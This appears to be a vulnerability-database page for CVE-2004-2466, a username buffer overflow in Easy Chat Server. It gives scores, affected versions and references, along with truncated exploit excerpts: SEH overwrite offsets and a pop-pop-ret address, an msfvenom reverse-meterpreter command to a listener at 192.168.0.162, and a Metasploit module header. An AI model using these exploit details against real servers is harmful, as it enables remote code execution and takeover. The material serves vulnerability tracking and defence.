CVE-2004-2466
published 2004-12-31CVE-2004-2466: chat.ghp in Easy Chat Server 1.2 allows remote attackers to cause a denial of service (server crash) via a long username parameter, possibly due to a buffer…
PriorityP340medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
74.70%
99.4th percentile
chat.ghp in Easy Chat Server 1.2 allows remote attackers to cause a denial of service (server crash) via a long username parameter, possibly due to a buffer overflow. NOTE: it was later reported that 2.2 is also affected.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| efs_software | easy_chat_server | — | — |
| efs_software | easy_chat_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- ·The SEH overwrite offset is dependent on the installation path of Easy Chat Server; the offset of 207 only applies when installed at 'C:\Program Files\EFS Software\Easy Chat Server'. Different install paths will shift the offset. ↗
- ·Version 2.2 of Easy Chat Server still reports 'Easy Chat Server/1.0' in the Server HTTP header, making version fingerprinting via the header unreliable for distinguishing 1.x from 2.x. ↗
- ·The CVE originally covered versions 1.2 and 2.2, but was later confirmed to also affect versions up to 3.1. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
exploitdb·2022-08-01·CVSS 5.0
CVE-2004-2466 [MEDIUM] Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
---
# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
# Exploit Author: r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
# CVE: CVE-2004-2466
# Installer: http://www.echatserver.com/
# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)
#!/usr/bin/python3
import sys
import socket
from struct import pack
host = sys.argv[1] # Recieve IP from user
port = int(sys.argv[2]) # Recieve Port from user
junk = b"A" * 217
nseh = pack("<L", 0x06eb9090) # short jump 6 bytes
seh = pack("<L", 0x1001ae86) # pop pop ret 1001AE86 SSLEAY32.DLL
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f
Exploit-DB
EFS Easy Chat Server 3.1 - Remote Stack Buffer Overflow
exploitdb·2014-05-12
CVE-2004-2466 EFS Easy Chat Server 3.1 - Remote Stack Buffer Overflow
EFS Easy Chat Server 3.1 - Remote Stack Buffer Overflow
---
## Exploit-DB Note: The offset to SEH is influenced by the installation path of the program.
## For this specific exploit to work, easy chat must be installed to:
## 'C:\Program Files\EFS Software\Easy Chat Server'
# Exploit Title: Easy Chat Server 3.1 stack buffer overflow
# Date: 9 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.echatserver.com/
# Software Link: http://www.echatserver.com/
# Version: 3.1
# Tested on: Windows 7 Enterprise SP1, English
#
# Description:
# A buffer overflow is triggered when when passing a long username.
import socket
import struct
# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
# msfencode -b "\x00\x20" -i w32-exec-c
Exploit-DB
EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)
exploitdb·2010-08-06
CVE-2004-2466 EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)
EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)
---
##
# $Id: efs_easychatserver_username.rb 9966 2010-08-06 20:12:51Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /Easy Chat Server\/1\.0/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in EFS Software Easy Chat Server.
Exploit-DB
EFS Easy Chat Server 2.2 - Remote Denial of Service
exploitdb·2007-08-14
CVE-2004-2466 EFS Easy Chat Server 2.2 - Remote Denial of Service
EFS Easy Chat Server 2.2 - Remote Denial of Service
---
# milw0rm.com [2007-08-14]
Metasploit
EFS Easy Chat Server Authentication Request Handling Buffer Overflow
metasploit
EFS Easy Chat Server Authentication Request Handling Buffer Overflow
EFS Easy Chat Server Authentication Request Handling Buffer Overflow
This module exploits a stack buffer overflow in EFS Software Easy Chat Server versions 2.0 to 3.1. By sending an overly long authentication request, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2004-07/0013.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2004-07/0077.htmlhttp://packetstormsecurity.com/files/167892/Easy-Chat-Server-3.1-Buffer-Overflow.htmlhttp://secunia.com/advisories/12006http://secunia.com/advisories/26461http://secunia.com/advisories/58427http://www.autistici.org/fdonato/advisory/EasyChatServer1.2-adv.txthttp://www.exploit-db.com/exploits/33326http://www.osvdb.org/7416http://www.securityfocus.com/bid/25328http://www.securityfocus.com/bid/67384http://www.vupen.com/english/advisories/2007/2901https://exchange.xforce.ibmcloud.com/vulnerabilities/16629https://exchange.xforce.ibmcloud.com/vulnerabilities/36013https://www.exploit-db.com/exploits/4289http://archives.neohapsis.com/archives/bugtraq/2004-07/0013.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2004-07/0077.htmlhttp://packetstormsecurity.com/files/167892/Easy-Chat-Server-3.1-Buffer-Overflow.htmlhttp://secunia.com/advisories/12006http://secunia.com/advisories/26461http://secunia.com/advisories/58427http://www.autistici.org/fdonato/advisory/EasyChatServer1.2-adv.txthttp://www.exploit-db.com/exploits/33326http://www.osvdb.org/7416http://www.securityfocus.com/bid/25328http://www.securityfocus.com/bid/67384http://www.vupen.com/english/advisories/2007/2901https://exchange.xforce.ibmcloud.com/vulnerabilities/16629https://exchange.xforce.ibmcloud.com/vulnerabilities/36013https://www.exploit-db.com/exploits/4289
2004-12-31
Published